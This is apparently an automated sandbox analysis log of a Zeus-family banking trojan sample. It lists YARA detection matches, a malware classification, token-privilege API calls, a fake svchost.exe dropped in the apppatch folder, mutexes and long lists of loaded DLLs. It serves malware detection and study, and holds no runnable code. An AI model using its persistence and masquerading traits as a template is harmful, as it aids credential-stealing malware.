Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7352, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7328, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7304, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7268, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: swvGCAxOMikYQeoQzimiprVu.exe PID: 7232, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Z8eHwAvqAh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winEXE@7/33@1112/23
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,1_2_00401E00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01305930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,22_2_01305930
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015B5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,25_2_015B5930
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B05930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,27_2_00B05930
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012C5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,29_2_012C5930
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01135930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,31_2_01135930
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01315930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,33_2_01315930
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00401CF0 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,1_2_00401CF0
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00402680 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,1_2_00402680
Source: C:\Windows\apppatch\svchost.exeFile created: C:\Program Files (x86)\Windows Defender\vonypom.comJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\login[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7472
Source: C:\Windows\apppatch\svchost.exeMutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7520
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7496
Source: C:\Windows\apppatch\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\9E2B3C2Da
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7544
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeFile created: C:\Users\user\AppData\Local\Temp\14B3.tmpJump to behavior
Source: Z8eHwAvqAh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Z8eHwAvqAh.exeReversingLabs: Detection: 84%
Source: Z8eHwAvqAh.exeString found in binary or memory: -help
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeFile read: C:\Users\user\Desktop\Z8eHwAvqAh.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Z8eHwAvqAh.exe "C:\Users\user\Desktop\Z8eHwAvqAh.exe"
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 744
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 732
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 740
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 740
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"Jump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: inetcomm.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: msoert2.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: inetres.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: vmhgfs.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: inetcomm.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: msoert2.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: inetres.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: vmhgfs.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winscard.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winsta.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeSection loaded: windows.storage.dll
